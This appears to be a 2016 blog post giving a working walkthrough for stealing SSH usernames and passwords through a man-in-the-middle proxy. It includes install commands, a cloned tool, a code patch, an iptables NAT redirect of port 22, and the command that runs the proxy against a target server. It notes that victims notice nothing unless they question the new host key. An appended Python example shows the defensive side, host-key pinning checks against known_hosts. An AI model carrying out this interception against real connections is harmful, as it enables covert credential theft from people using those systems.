Tuesday, October 25, 2016

Intercept username and password using SSH MITM (man in the middle)

*** setup information
- diagram
client --> mitmproxy --> ssh server

- target server ip: 192.168.202.124


1- install dependency packages
$ sudo pip install twisted
$ sudo apt-get install python-service-identity
$ pip install pycrypto

2- download the mitmproxy
$ git clone https://github.com/saironiq/mitmproxy.git

3- if you cannot run mitmreplay_ssh, the pycrypto version you installed may have a different module layout, so:
- modify file mitmproxy/mitmproxy/sshdebug.py
  -- line 655: change it to the line below
mpints.append(cnumber.bytes_to_long(
  -- line 11: add the following import
from Crypto.Util import number as cnumber

4- generate keys
$ cd mitmproxy
$ sudo ./mitmproxy

5- enable ip_forward and add the NAT redirect rule
$ sudo sysctl -w net.ipv4.ip_forward=1
$ sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222

6- run mitmproxy_ssh and point it at the target server 192.168.202.124
$ sudo ./mitmproxy_ssh -H 192.168.202.124 -s

7- now when the client logs in to the SSH server, the interception is completely transparent to them, provided they do not question the new host key the server appears to present

- snapshot of the username and password captured on our mitmproxy PC when the client connects to server 192.168.202.124 with ssh
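The whole setup above hinges on step 7: the client accepting a host key that differs from the one it saw before. The following is an added example (not code from the post or from the mitmproxy project) of the check a client-side pinning policy performs before any password is typed: parse a known_hosts entry, compare the pinned key blob with the key offered at connection time, and report an OpenSSH-style SHA256 fingerprint. The key bytes, the known_hosts line and the `ed25519_blob` helper are constructed for this example; the verdicts mirror what ssh does with StrictHostKeyChecking=yes.

```python
import base64
import hashlib


def ssh_string(b: bytes) -> bytes:
    """Encode bytes as an SSH wire-format string (4-byte big-endian length + data)."""
    return len(b).to_bytes(4, "big") + b


def ed25519_blob(raw32: bytes) -> bytes:
    """Build the public-key blob ssh stores in known_hosts for an ssh-ed25519 key (helper constructed here)."""
    return ssh_string(b"ssh-ed25519") + ssh_string(raw32)


def fingerprint(key_blob: bytes) -> str:
    """OpenSSH-style fingerprint: SHA256 of the key blob, base64 with '=' padding stripped."""
    digest = hashlib.sha256(key_blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_known_hosts(text: str) -> dict:
    """Map (host, keytype) -> key blob for plain (unhashed) known_hosts lines."""
    pinned = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 3 or fields[0].startswith("#"):
            continue
        for host in fields[0].split(","):
            pinned[(host, fields[1])] = base64.b64decode(fields[2])
    return pinned


def check_host_key(pinned: dict, host: str, keytype: str, offered: bytes) -> str:
    """Only 'match' may proceed to authentication; 'mismatch' is exactly what a
    proxy presenting its own generated key produces, and 'unknown' is a first contact."""
    expected = pinned.get((host, keytype))
    if expected is None:
        return "unknown"
    return "match" if expected == offered else "mismatch"


# Constructed sample data (not real keys): the genuine server key pinned earlier
# and a different key, as a proxy terminating the connection would present.
GENUINE_KEY = ed25519_blob(bytes(range(32)))
PROXY_KEY = ed25519_blob(bytes(range(32, 64)))
KNOWN_HOSTS = "192.168.202.124 ssh-ed25519 " + base64.b64encode(GENUINE_KEY).decode() + "\n"

if __name__ == "__main__":
    pinned = parse_known_hosts(KNOWN_HOSTS)
    for label, key in (("genuine", GENUINE_KEY), ("proxy", PROXY_KEY)):
        verdict = check_host_key(pinned, "192.168.202.124", "ssh-ed25519", key)
        print(f"{label}: {fingerprint(key)} -> {verdict}")
```

A client that refuses on anything but "match" (or an administrator who distributes known_hosts entries centrally) never reaches the password prompt through the proxy.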
